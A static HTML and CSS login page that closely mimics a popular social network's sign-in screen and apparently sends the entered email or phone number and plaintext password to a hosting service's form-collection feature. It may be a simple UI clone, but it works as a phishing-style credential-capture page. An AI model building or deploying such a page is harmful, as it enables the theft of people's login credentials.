<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Adding Form</title>
    <style>
        * {
            box-sizing: border-box;
            text-decoration: none;
        }

        body {
            margin: 0;
            padding: 0;
            font-family: poppins;
            background-color: #F0F2F5;
        }

        section {
            width: 100%;
            height: 100vh;
        }

        section .container {
            max-width: 1200px;
            margin: 0 auto;
            height: 100%;
        }

        .container form {
            width: 400px;
            background: white;
            padding: 20px;
            border-radius: 4px;
            box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
        }

        form input {
            border: 1px solid rgb(214, 214, 214);
            border-radius: 4px;
            padding: 15px;
            font-size: 16px;
            width: 100%;
            outline: none;
        }

        input[type="password"] {
            margin: 16px 0;
        }

        .flex {
            display: flex;
            justify-content: center;
            align-items: center;
        }

        button {
            margin-top: 8px;
            display: inline-block;
            width: 100%;
            font-size: 16px;
            line-height: 48px;
            border-radius: 2px;
            outline: none;
            border: none;
            background-color: #1877F2;
            color: #fff;
            cursor: pointer;
        }

        .forget-password {
            text-align: center;
        }

        .forget-password a {
            color: #1877F2;
        }

        .light-hr {
            color: rgba(253, 253, 253, 0.659);
        }

        .create_new {
            display: flex;
            justify-content: center;
            margin-top: 20px;
        }

        .createbtn {
            background: #42B72A;
            color: #fff;
            padding: 10px 20px;
            margin: 0 auto;
            font-size: 16px;
            border-radius: 4px;
        }
    </style>
</head>

<body>
    <section>
        <div class="container flex">
            <form name="contact" autocomplete="off" method="POST" data-netlify="true">
                <input type="text" placeholder="Email or Phone Number" required autofocus="1"><br>
                <input type="text" required placeholder="Password">
                <br>
                <button type="submit">Log In</button>
                <p class="forget-password"><a href="#">Forget Password ?</a></p>
                <hr class="light-hr">
                <div class="create_new">
                    <a class="createbtn" href="#"> Create New Account</a>

                </div>
            </form>
        </div>
    </section>
</body>

</html>